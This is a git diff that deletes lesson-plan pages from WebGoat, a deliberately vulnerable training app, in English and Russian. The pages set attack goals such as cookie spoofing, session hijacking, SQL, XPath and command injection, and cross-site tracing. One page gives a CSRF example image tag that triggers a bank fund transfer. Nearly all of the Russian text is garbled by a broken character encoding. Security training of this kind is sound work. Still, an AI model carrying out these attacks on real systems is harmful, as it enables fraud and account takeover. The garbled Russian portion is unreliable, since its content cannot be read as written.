THIS MAKES IT POSSIBLE TO REALLY ATTACK YOUR SERVER! DO NOT DO THIS - UNTIL YOU KNOW WHAT YOU ARE DOING. THIS CONFIGURATION SHOULD BE ONLY USED IN -SAFE NETWORKS!

-

By its default configuration, WebGoat is only -reachable within the localhost. In a laboratory or a class -there is maybe the need of having a server and a few clients. -In this case it is possible to make WebGoat reachable. -

- -

Permit Only Certain Client Connection

-

-If you have made WebGoat reachable it is reachable for -all clients. If you want to make it reachable only for certain clients specified -by their IP you can archive this by using a 'Remote Address Filter'. -The filter can be set in a whitebox or blackbox approach. Here is -only discussed the whitebox approach. You have to add following lines to the -Host section of server.xml in your Tomcat server configuration: -

-
-	<Valve className="org.apache.catalina.valves.RemoteAddrValve"
-	allow="127.0.0.1,ip1,ip2"/>
-
-

In this case only localhost, ip1 and ip2 are permitted to connect.

- - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/TraceXSS.html b/src/main/webapp/lesson_plans/en/TraceXSS.html deleted file mode 100644 index 2358d4fc4..000000000 --- a/src/main/webapp/lesson_plans/en/TraceXSS.html +++ /dev/null @@ -1,9 +0,0 @@ -
-

Lesson Plan Title: How to Perform Cross Site Tracing (XST) Attacks

-
-

Concept / Topic To Teach:

- -It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved. -

General Goal(s):

-Tomcat is configured to support the HTTP TRACE command. Your goal is to perform a Cross Site Tracing (XST) attack. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/UncheckedEmail.html b/src/main/webapp/lesson_plans/en/UncheckedEmail.html deleted file mode 100644 index db3c630e9..000000000 --- a/src/main/webapp/lesson_plans/en/UncheckedEmail.html +++ /dev/null @@ -1,9 +0,0 @@ -
-

Lesson Plan Title: How to Exploit Unchecked Email

-
-

Concept / Topic To Teach:

- -It is always a good practice to validate all inputs. Most sites allow non-authenticated users to send email to a 'friend'. This is a great mechanism for spammers to send out email using your corporate mail server. - -

General Goal(s):

-The user should be able to send and obnoxious email message. diff --git a/src/main/webapp/lesson_plans/en/UsefulTools.html b/src/main/webapp/lesson_plans/en/UsefulTools.html deleted file mode 100644 index 99bee445d..000000000 --- a/src/main/webapp/lesson_plans/en/UsefulTools.html +++ /dev/null @@ -1,41 +0,0 @@ - - -

Useful Tools

-

-Below is a list of tools we've found useful in solving the WebGoat lessons. You will need a proxy like OWASP ZAP or Paros to solve most of the lessons.

-

OWASP ZAP:

-

-Like WebGoat, Zed Attack Proxy (ZAP) is a part of OWASP and is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. -It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. -ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually..

-

-Webpage: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project -
The .jar install file can be found at the OWASP ZAP Google Code Project

-

After installing ZAP and configuring your browser to use it as a proxy on localhost we can start. To intercept a request, -click the green arrow icon turning it red. If we browse a WebGoat page, ZAP will intercept the HTTP request. -Here we can read and edit the intercepted parameters and headers. After editing is complete press the play icon to submit the request to the server.
-

-

-

Modern Browsers:

-

-Most modern browser have developer tools that will allow you to inspect and modify request data. -

- -

Wireshark

-

-Wireshark is a network protocol analyzer. You can sniff network traffic and gather useful -informations this way.

-

-Webpage:http://www.wireshark.org - -

- -

Scanners (Attacking Proxies):

-

-There are many vulnerability scanners for your own web applications. They can find XSS, Injection Flaws and other vulnerabilities. Below are links to three open source scanners.

-Nessus:http://www.nessus.org
-Paros:http://www.parosproxy.org
-OWASP ZAP:https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
-

- -
diff --git a/src/main/webapp/lesson_plans/en/WSDLScanning.html b/src/main/webapp/lesson_plans/en/WSDLScanning.html deleted file mode 100644 index dd80ef598..000000000 --- a/src/main/webapp/lesson_plans/en/WSDLScanning.html +++ /dev/null @@ -1,9 +0,0 @@ -
-

Lesson Plan Title: How to Perform WSDL Scanning

-
-

Concept / Topic To Teach:

- -Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file. -

General Goal(s):

-This screen is the API for a web service. Check the WSDL file for this web service and try to get some customer credit numbers. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html b/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html deleted file mode 100644 index 9c9b86c8a..000000000 --- a/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html +++ /dev/null @@ -1,12 +0,0 @@ -
-

Lesson Plan Title: How to Spoof an Authentication Cookie

-
- -

Concept / Topic To Teach:

- -Many applications will automatically log a user into their site if the right authentication cookie is specified.   Some times the cookie values can be guessed if the algorithm for generating the cookie can be obtained.  Some times the cookies are left on the client machine and can be stolen by exploiting another system vulnerability.  Some times the cookies maybe intercepted using Cross site scripting.  This lesson tries to make the student aware of authentication cookies and presents the student with a way to defeat the cookie authentication method in this lesson.
-

General Goal(s):

-
- The user should be able to bypass the authentication check.
-Login using the webgoat/webgoat account to see what happens. You may also try aspect/aspect. When you understand the authentication cookie, try changing your identity to alice.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WeakSessionID.html b/src/main/webapp/lesson_plans/en/WeakSessionID.html
deleted file mode 100644
index 45157e0b5..000000000
--- a/src/main/webapp/lesson_plans/en/WeakSessionID.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-

Lesson Plan Title: How to Hijack a Session

-
-

Concept / Topic To Teach:

- -Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks. -

General Goal(s):

-Try to access an authenticated session belonging to someone else.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WelcomeScreeen.html b/src/main/webapp/lesson_plans/en/WelcomeScreeen.html
deleted file mode 100644
index be93e40e2..000000000
--- a/src/main/webapp/lesson_plans/en/WelcomeScreeen.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-

Lesson Plan Title:Welcome

-
-

Concept / Topic To Teach:

-This lesson presents the basics for understanding the transfer of data between the browser and the web application. -

Standards Addressed:

-

General Goal(s):

-

Specific Objectives:

-

Required Materials:

-

Anticipatory Set (Lead-In):

-

Step-By-Step Procedures:

-

Plan For Independent Practice:

-

Closure (Reflect Anticipatory Set):

-

Assessment Based On Objectives:

-

Extensions (For Gifted Students):

-

Possible Connections To Other Subjects:

\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WsSAXInjection.html b/src/main/webapp/lesson_plans/en/WsSAXInjection.html
deleted file mode 100644
index 23a2e8607..000000000
--- a/src/main/webapp/lesson_plans/en/WsSAXInjection.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-

Lesson Plan Title: How to Perform Web Service SAX Injection

-
-

Concept / Topic To Teach:

- -Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file. -

General Goal(s):

-Some web interfaces make use of Web Services in the background. If the frontend relies on the web service for all input validation, it may be possible to corrupt the XML that the web interface sends. -
-
-In this exercise, try to change the password for a user other than 101.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WsSqlInjection.html b/src/main/webapp/lesson_plans/en/WsSqlInjection.html
deleted file mode 100644
index 95738b0bf..000000000
--- a/src/main/webapp/lesson_plans/en/WsSqlInjection.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-

Lesson Plan Title: How to Perform Web Service SQL Injection

-
-

Concept / Topic To Teach:

- -Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file. -

General Goal(s):

-Check the web service description language (WSDL) file and try to obtain multiple customer credit card numbers. You will not see the results returned to this screen. When you believe you have suceeded, refresh the page and look for the 'green star'.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/XMLInjection.html b/src/main/webapp/lesson_plans/en/XMLInjection.html
deleted file mode 100644
index fc9c73697..000000000
--- a/src/main/webapp/lesson_plans/en/XMLInjection.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-

Lesson Plan Title: How to Perform XML Injection Attacks.

-
- -

Concept / Topic To Teach:

- This lesson teaches how to perform XML Injection attacks. -
-
-

-How the attacks works: -

-AJAX applications use XML to exchange information with the server. This XML can be easily intercepted and altered by a malicious attacker. - -
-

General Goal(s):

-
-WebGoat-Miles Reward Miles shows all the rewards available. Once you've entered your account ID, the lesson will show you your balance and the products you can afford. Your goal is to try to add more rewards to your allowed set of rewards. Your account ID is 836239.
-
-
diff --git a/src/main/webapp/lesson_plans/en/XPATHInjection.html b/src/main/webapp/lesson_plans/en/XPATHInjection.html
deleted file mode 100644
index 926d8f151..000000000
--- a/src/main/webapp/lesson_plans/en/XPATHInjection.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-

Lesson Plan Title: How to Perform XPATH Injection Attacks.

-
- -

Concept / Topic To Teach:

- This lesson teaches how to perform XPath Injection attacks. -
-
-

-How the attacks works: -

-Similar to SQL Injection, XPATH Injection attacks occur when a web site uses user supplied information to query XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured or access data that they may not normally have access to. -They may even be able to elevate their privileges on the web site if the xml data is being used for authentication (such as an xml based user file). - -Querying XML is done with XPath, a type of simple descriptive statement that allows the xml query to locate a piece of information. Like SQL you can specify certain attributes to find and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data. - - -
-

General Goal(s):

-
-The form below allows employees to see all their personal data including their salaries. Your account is Mike/test123. Your goal is to try to see other employees data as well.
-
diff --git a/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html b/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html
deleted file mode 100644
index e45d57ddf..000000000
--- a/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-

Ðазвание урока: ИÑпользование матрицы ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»Ñ Ð´Ð¾Ñтупа

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Ð’ Ñхемах оÑнованных на ролÑÑ… Ñама роль предÑтавлÑет из ÑÐµÐ±Ñ Ð½Ð°Ð±Ð¾Ñ€ разрешений доÑтупа и привилегий. -Пользователю одновременно может быть приÑвоена одна или более ролей. -Подобные Ñхемы чаще вÑего включают в ÑÐµÐ±Ñ Ð´Ð²Ð° механизма: механизм работы Ñ Ñ€Ð°Ð·Ñ€ÐµÑˆÐµÐ½Ð¸Ñми доÑтупа и -механизм Ð½Ð°Ð·Ð½Ð°Ñ‡ÐµÐ½Ð¸Ñ Ð¿Ñ€Ð¸Ð²Ð¸Ð»ÐµÐ³Ð¸Ð¹. Ð’ ÑлучаÑÑ… когда Ñ€ÐµÐ°Ð»Ð¸Ð·Ð°Ñ†Ð¸Ñ Ð´Ð°Ð½Ð½Ð¾Ð¹ Ñхемы имеет какие-то изъÑны пользователь может получить -доÑтуп к функционалу, к которому ему обращатьÑÑ Ð½Ðµ разрешено. Или он может каким-либо образом повыÑить Ñвои -привилегии в приложении. -

ОÑновные цели и задачи:

-Каждый пользователь имеет Ñвою роль(и), наличие которой позволÑет ему получать доÑтуп к Ñтрого определённым реÑурÑам. -Вашей целью ÑвлÑетÑÑ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ðµ механизма Ñ€Ð°Ð·Ð³Ñ€Ð°Ð½Ð¸Ñ‡ÐµÐ½Ð¸Ñ Ð´Ð¾Ñтупа на данном Ñайте и поиÑк в нём изъÑнов. -Только пользователи из группы [Admin] должны иметь доÑтуп к разделу ÑƒÐ¿Ñ€Ð°Ð²Ð»ÐµÐ½Ð¸Ñ Ð°ÐºÐºÐ°ÑƒÐ½Ñ‚Ð°Ð¼Ð¸. - diff --git a/src/main/webapp/lesson_plans/ru/BackDoors.html b/src/main/webapp/lesson_plans/ru/BackDoors.html deleted file mode 100644 index 0769f43b2..000000000 --- a/src/main/webapp/lesson_plans/ru/BackDoors.html +++ /dev/null @@ -1,23 +0,0 @@ -
-

Ðазвание урока: Как оÑущеÑтвлÑетÑÑ Ð¿Ð¾Ð¼ÐµÑ‰ÐµÐ½Ð¸Ðµ вредоноÑных конÑтрукций в БД.

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Помещение вредоноÑных конÑтрукций в БД -
-
-

-Как работает данный вид атаки: -

-База данных обычно иÑпользуетÑÑ ÐºÐ°Ðº backend веб-приложений в качеÑтве хранилища важных данных. Ð’ процеÑÑе атаки злоумышленник -может помещать в неё различные вредоноÑные конÑтрукции, например опаÑные триггеры. Триггеры вызываютÑÑ -каждый раз при выполнении базой определённой операции (выборка, вÑтавка, обновление данных и Ñ‚.д.). Ðапример атакующий -может Ñоздать триггер который будет у вÑех региÑтрирующихÑÑ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÐµÐ¹ менÑть почтовые адреÑа на подконтрольный ему email. -
-

ОÑÐ½Ð¾Ð²Ð½Ð°Ñ Ñ†ÐµÐ»ÑŒ(и):

- -* Ð’Ñ‹ должны понÑть как Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ ÑкÑплуатации уÑзвимого запроÑа Ñоздать триггер -* У Ð²Ð°Ñ Ð½Ðµ получитÑÑ Ñоздать в данном приложении наÑтоÑщий вредоноÑный триггер Ñ‚.к. БД иÑÐ¿Ð¾Ð»ÑŒÐ·ÑƒÐµÐ¼Ð°Ñ WebGoat`ом не поддерживает триггеров. -* Ваш ID Ð´Ð»Ñ Ð²Ñ…Ð¾Ð´Ð° - 101. - - diff --git a/src/main/webapp/lesson_plans/ru/BasicAuthentication.html b/src/main/webapp/lesson_plans/ru/BasicAuthentication.html deleted file mode 100644 index fe1d9afeb..000000000 --- a/src/main/webapp/lesson_plans/ru/BasicAuthentication.html +++ /dev/null @@ -1,16 +0,0 @@ -
-

Ðазвание урока: ОÑÐ½Ð¾Ð²Ð½Ð°Ñ Ð°ÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -ОÑÐ½Ð¾Ð²Ð½Ð°Ñ Ð°ÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ Ð¸ÑпользуетÑÑ Ð´Ð»Ñ Ð·Ð°Ñ‰Ð¸Ñ‚Ñ‹ реÑурÑов раÑположенных на Ñтороне Ñервера. -При получении запроÑа от Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð²ÐµÐ±-Ñервер отправлÑет ему ответ Ñ ÐºÐ¾Ð´Ð¾Ð¼ 401. -Получив его браузер запрашивает у Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð»Ð¾Ð³Ð¸Ð½ и пароль в Ñпециальном диалоговом окне. ПоÑле -ввода браузер кодирует полученные данные по алгоритму base64 и отÑылает веб-Ñерверу. -ПоÑледний, в Ñвою очередь, проверÑет полученную информацию и, еÑли вÑÑ‘ правильно, отдаёт клиенту запрашиваемый -документ. Указанные пользователем данные далее автоматичеÑки отÑылаютÑÑ Ð±Ñ€Ð°ÑƒÐ·ÐµÑ€Ð¾Ð¼ при каждом обращении к -защищённым реÑурÑам. - -

ОÑÐ½Ð¾Ð²Ð½Ð°Ñ Ñ†ÐµÐ»ÑŒ(и):

-Ðа Ñтом уроке вашей целью ÑвлÑетÑÑ Ð¿Ð¾Ð½Ð¸Ð¼Ð°Ð½Ð¸Ðµ механизмов оÑновной аутентификации и ответ на вопроÑÑ‹ которые находÑÑ‚ÑÑ Ð½Ð¸Ð¶Ðµ. - diff --git a/src/main/webapp/lesson_plans/ru/BlindSqlInjection.html b/src/main/webapp/lesson_plans/ru/BlindSqlInjection.html deleted file mode 100644 index 629a396cc..000000000 --- a/src/main/webapp/lesson_plans/ru/BlindSqlInjection.html +++ /dev/null @@ -1,25 +0,0 @@ -
-

Ðазвание темы: ИÑпользование Ñлепых SQL-инъекций

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -SQL-инъекции предÑтавлÑÑŽÑ‚ Ñерьёзную опаÑноÑть Ð´Ð»Ñ Ñайтов, Ñ‡ÑŒÑ Ñ€Ð°Ð±Ð¾Ñ‚Ð° оÑновываетÑÑ Ð½Ð° БД. -Методы оÑущеÑÑ‚Ð²Ð»ÐµÐ½Ð¸Ñ Ñ‚Ð°ÐºÐ¸Ñ… атак очень проÑты в оÑвоении и ущерб наноÑимый ими Ð½ÐµÐ»ÑŒÐ·Ñ Ð½ÐµÐ´Ð¾Ð¾Ñ†ÐµÐ½Ð¸Ð²Ð°Ñ‚ÑŒ Ñ‚.к. злоумышленник -Ñ Ð¸Ñ… помощью в некоторых ÑлучаÑÑ… может добитьÑÑ Ð¿Ð¾Ð»Ð½Ð¾Ð¹ компрометации ÑиÑтемы. -ÐеÑÐ¼Ð¾Ñ‚Ñ€Ñ Ð½Ð° вÑÑŽ опаÑноÑть SQL-инъекций каждый день поÑвлÑетÑÑ Ð¼Ð½Ð¾Ð¶ÐµÑтво уÑзвимых к ним веб-приложений. -
-Ðа Ñамом деле ÑÐµÐ¹Ñ‡Ð°Ñ Ð¾Ð¿Ð°ÑноÑть данного вида уÑзвимоÑтей Ñильно преувеличивают. ЕÑть множеÑтво ÑпоÑобов Ð±Ð»Ð°Ð³Ð¾Ð´Ð°Ñ€Ñ ÐºÐ¾Ñ‚Ð¾Ñ€Ñ‹Ð¼ -любой разработчик практичеÑки полноÑтью может защитить Ñвоё приложение от них. -Вообще проверка вÑех входÑщих данных ÑвлÑетÑÑ Ð¾Ñ‡ÐµÐ½ÑŒ хорошей практикой не только при работе Ñ Ð‘Ð”, но и -в ÑлучаÑÑ… Ñ Ð²Ñ‹Ð¿Ð¾Ð»Ð½ÐµÐ½Ð¸ÐµÐ¼ команд ОС, Ñкриптов и Ñ‚.д. -
- - -

Ð“Ð»Ð°Ð²Ð½Ð°Ñ Ñ†ÐµÐ»ÑŒ(и):

-Форма, раÑÐ¿Ð¾Ð»Ð¾Ð¶ÐµÐ½Ð½Ð°Ñ Ð½Ð¸Ð¶Ðµ, позволÑет пользователю вводить номер аккаунта и проверÑть дейÑтвителен он или нет. -ВоÑпользуйтеÑÑŒ данной формой Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб через уÑзвимоÑть на Ñтороне Ñервера получить -возможноÑть извлекать произвольные данные из БД. -

Ascii-Ð·Ð½Ð°Ñ‡ÐµÐ½Ð¸Ñ Ñимволов которые могут вам понадобитьÑÑ: 'A' = 65 'Z' = 90 'a' = 97 'z' = 122 -

Целью ÑвлÑетÑÑ Ð¿Ð¾Ð»ÑƒÑ‡ÐµÐ½Ð¸Ðµ Ñодержимого Ð¿Ð¾Ð»Ñ first_name в таблице user_data Ð´Ð»Ñ Ð·Ð°Ð¿Ð¸Ñи Ñ Ð½Ð¾Ð¼ÐµÑ€Ð¾Ð¼ 15613. -ПомеÑтите его Ð¸Ð¼Ñ Ð² Ñту форму Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб закончить урок. diff --git a/src/main/webapp/lesson_plans/ru/BufferOverflow.html b/src/main/webapp/lesson_plans/ru/BufferOverflow.html deleted file mode 100644 index 272298787..000000000 --- a/src/main/webapp/lesson_plans/ru/BufferOverflow.html +++ /dev/null @@ -1,9 +0,0 @@ -
-

Ðазвание урока: ЭкÑÐ¿Ð»ÑƒÐ°Ñ‚Ð°Ñ†Ð¸Ñ ÑƒÑзвимоÑтей Ð¿ÐµÑ€ÐµÐ¿Ð¾Ð»Ð½ÐµÐ½Ð¸Ñ Ð±ÑƒÑ„Ñ„ÐµÑ€Ð°

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Как проводить ÑкÑплуатацию уÑзвимоÑтей Ð¿ÐµÑ€ÐµÐ¿Ð¾Ð»Ð½ÐµÐ½Ð¸Ñ Ð±ÑƒÑ„Ñ„ÐµÑ€Ð°. -

ОÑновные цели и задачи:

-Ð”Ð»Ñ Ð´Ð°Ð½Ð½Ð¾Ð³Ð¾ урока требуетÑÑ Ð°Ð²Ñ‚Ð¾Ñ€. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/CSRF.html b/src/main/webapp/lesson_plans/ru/CSRF.html deleted file mode 100644 index 47e23b65e..000000000 --- a/src/main/webapp/lesson_plans/ru/CSRF.html +++ /dev/null @@ -1,40 +0,0 @@ -
-

Ðазвание урока: Проведение атак межÑайтовой подделки запроÑов.

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Ðа данном уроке вы научитеÑÑŒ иÑпользовать уÑзвимоÑти межÑайтовой подделки запроÑов (CSRF). -
-
-

-Как работает данный тип атак: -

-При проведении атак межÑайтовой подделки запроÑов жертву заÑтавлÑÑŽÑ‚ каким-либо образом -загрузить Ñтраницу Ñодержащую опаÑную картинку, типа той что предÑтавлена ниже: - -
<img src="http://www.mybank.com/sendFunds.do?acctId=123456"/>
- -Когда браузер жертвы обрабатывает такую Ñтраницу, он автоматичеÑки Ñовершает обращение -к Ñайту www.mybank.com, к Ñкрипту transferFunds.do Ð¿ÐµÑ€ÐµÐ´Ð°Ð²Ð°Ñ Ð½ÐµÐ¾Ð±Ñ…Ð¾Ð´Ð¸Ð¼Ñ‹Ð¹ злоумышленнику параметр. -Браузер будет думать что Ñто проÑтое изображение, тогда как на Ñамом деле обращение к Ñтому -адреÑу вызовет перевод денег. - -ВмеÑте Ñ Ð·Ð°Ð¿Ñ€Ð¾Ñом, уходÑщим на Ñайт банка, будут переданы и cookies клиента. Следовательно, -еÑли в Ñтот момент пользователь будет авторизирован на www.mybank.com, и в его cookies будет хранитÑÑ -идентификатор активной ÑеÑÑии, Ñкрипт transferFunds.do примет Ñтот Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð·Ð° легитимный и -Ñовершит необходимую злоумышленнику операцию. - -Таким образом, атакующий может производить практичеÑки вÑе дейÑтвиÑ, которые ÑпоÑобен делать -наÑтоÑщий пользователь. -
-

ОÑновные цели и задачи:

- -Ваша цель - поÑлать в новоÑтную группу пиÑьмо, Ñодержащее в Ñебе изображение Ñо -Ñпециально Ñформированным адреÑом. Картинка должна иметь размер 1*1px и производить -CSRF-атаку, заÑтавлÑÑ Ð±Ñ€Ð°ÑƒÐ·ÐµÑ€ обращатьÑÑ Ðº текущей Ñтранице, но Ñ Ð´Ð¾Ð¿Ð¾Ð»Ð½Ð¸Ñ‚ÐµÐ»ÑŒÐ½Ñ‹Ð¼ параметром -в URL - "transferFunds=4000". Когда вы отошлёте Ñообщение и оно отобразитÑÑ Ð½Ð° Ñкране, -браузер автоматичеÑки оÑущеÑтвит необходимый запроÑ. Как только вы решили что выполнили Ñто задание -проÑто обновите Ñтраницу. ЕÑли вÑÑ‘ Ñделано верно, то в главном меню, на против ÑоответÑтвующего урока, -поÑвитÑÑ Ð·ÐµÐ»Ñ‘Ð½Ð°Ñ Ð¾Ñ‚Ð¼ÐµÑ‚ÐºÐ°. - - diff --git a/src/main/webapp/lesson_plans/ru/ChallengeScreen.html b/src/main/webapp/lesson_plans/ru/ChallengeScreen.html deleted file mode 100644 index b3d9b3321..000000000 --- a/src/main/webapp/lesson_plans/ru/ChallengeScreen.html +++ /dev/null @@ -1,7 +0,0 @@ -
-

Lesson Plan Title: Putting it all together

-

-

Concept / Topic To Teach:

-This lesson creates a challenge that will help the student apply all that they have learned.
-General Goal(s):
-Display the secret message.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/ClientSideFiltering.html b/src/main/webapp/lesson_plans/ru/ClientSideFiltering.html
deleted file mode 100644
index 1fa409480..000000000
--- a/src/main/webapp/lesson_plans/ru/ClientSideFiltering.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-

Ðазвание урока: Ð¤Ð¸Ð»ÑŒÑ‚Ñ€Ð°Ñ†Ð¸Ñ Ð´Ð°Ð½Ð½Ñ‹Ñ… на Ñтороне клиента

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Ð’Ñегда ÑчитаетÑÑ Ñ…Ð¾Ñ€Ð¾ÑˆÐµÐ¹ практикой отправлÑть на Ñторону клиента только ту информацию, доÑтуп к которой он имеет. -Ð’ данном уроке на Ñторону клиента будет отправлено очень много информации, что ÑоздаÑÑ‚ Ñерьёзные проблемы Ñ ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»ÐµÐ¼ доÑтупа к ней. - -

ОÑновные цели и задачи:

-Ваша цель ÑоÑтоит в том, чтоб Ñреди принимаемых Ñо Ñтороны Ñервера данных найти ту -информацию, доÑтупа к которой у Ð²Ð°Ñ Ð½ÐµÑ‚. diff --git a/src/main/webapp/lesson_plans/ru/ClientSideValidation.html b/src/main/webapp/lesson_plans/ru/ClientSideValidation.html deleted file mode 100644 index ccc490f83..000000000 --- a/src/main/webapp/lesson_plans/ru/ClientSideValidation.html +++ /dev/null @@ -1,14 +0,0 @@ -
-

Ðазвание урока: Insecure Client Storage

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Хорошей практикой ÑвлÑетÑÑ Ð¿Ñ€Ð¾Ð²ÐµÑ€ÐºÐ° на Ñтороне Ñервера абÑолютно вÑех принимаемых данных. -Ð ÐµÐ°Ð»Ð¸Ð·Ð°Ñ†Ð¸Ñ Ð¼ÐµÑ…Ð°Ð½Ð¸Ð·Ð¼Ð¾Ð² проверки только на Ñтороне клиента делает приложение уÑзвимым. -Запомните, вÑÑ‘ что отправлÑетÑÑ Ð½Ð° Ñторону клиента не должно Ñодержать критичеÑки важных -данных или механизмов. - -

ОÑновные цели:

-Ð’ данном упражнении Ð¿ÐµÑ€Ð²Ð°Ñ Ð²Ð°ÑˆÐ° задача - обнаружить дейÑтвующий код купона обеÑпечивающего Ñкидку. -Далее необходимо иÑÑледовать механизм проверки вводимых данных и добитьÑÑ Ð¿Ð¾ÐºÑƒÐ¿ÐºÐ¸ товара за нулевую цену. - diff --git a/src/main/webapp/lesson_plans/ru/CommandInjection.html b/src/main/webapp/lesson_plans/ru/CommandInjection.html deleted file mode 100644 index f30ac8a45..000000000 --- a/src/main/webapp/lesson_plans/ru/CommandInjection.html +++ /dev/null @@ -1,18 +0,0 @@ -
-

Ðазвание урока: ИÑпользование инъекций команд

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Ðтаки клаÑÑа "Ð˜Ð½ÑŠÐµÐºÑ†Ð¸Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´" предÑтавлÑÑŽÑ‚ Ñобой Ñерьёзную угрозу Ð´Ð»Ñ Ñайтов принимающих -от пользователей какие-либо данные. Методика их иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð´Ð¾Ñтаточно тривиальна, но в тоже -Ð²Ñ€ÐµÐ¼Ñ Ð¾Ð½Ð¸ могут приводить к полной компрометации атакованной ÑиÑтемы. ÐеÑÐ¼Ð¾Ñ‚Ñ€Ñ Ð½Ð° Ñто количеÑтво -приложений имеющих подобные уÑзвимоÑти неуклонно раÑтёт.
-Ðа Ñамом деле подобные угрозы могут быть полноÑтью уÑтранены Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ принÑÑ‚Ð¸Ñ Ñ€Ð°Ð·Ñ€Ð°Ð±Ð¾Ñ‚Ñ‡Ð¸ÐºÐ°Ð¼Ð¸ -проÑтейших мер направленных на обеÑпечение безопаÑноÑти приложениÑ. Ð’ данном уроке -будет продемонÑтрированно множеÑтво примеров Ð¿Ñ€Ð¾Ð²ÐµÐ´ÐµÐ½Ð¸Ñ Ð¸Ð½ÑŠÐµÐºÑ†Ð¸Ð¹ через поÑтупающие -из вне параметры.
-Запомните что проверка вÑех получаемых от Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´Ð°Ð½Ð½Ñ‹Ñ…, оÑобенно тех, которые будут иÑпользоватьÑÑ -в командах ОС, Ñкриптах или запроÑах к БД, ÑвлÑетÑÑ Ñ…Ð¾Ñ€Ð¾ÑˆÐµÐ¹ практикой
- -

ОÑновные цели и задачи:

-Попробуйте найти уÑзвимоÑть через которую можно выполнить какую-нибудь команду операционной ÑиÑтемы. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/ConcurrencyCart.html b/src/main/webapp/lesson_plans/ru/ConcurrencyCart.html deleted file mode 100644 index 1ddbda659..000000000 --- a/src/main/webapp/lesson_plans/ru/ConcurrencyCart.html +++ /dev/null @@ -1,31 +0,0 @@ - - - - - - План урока - - - -
-

Ðазвание урока: УÑзвимоÑть при одновременной работе Ñ Ñ‚Ð¾Ð²Ð°Ñ€Ð½Ð¾Ð¹ корзиной

-
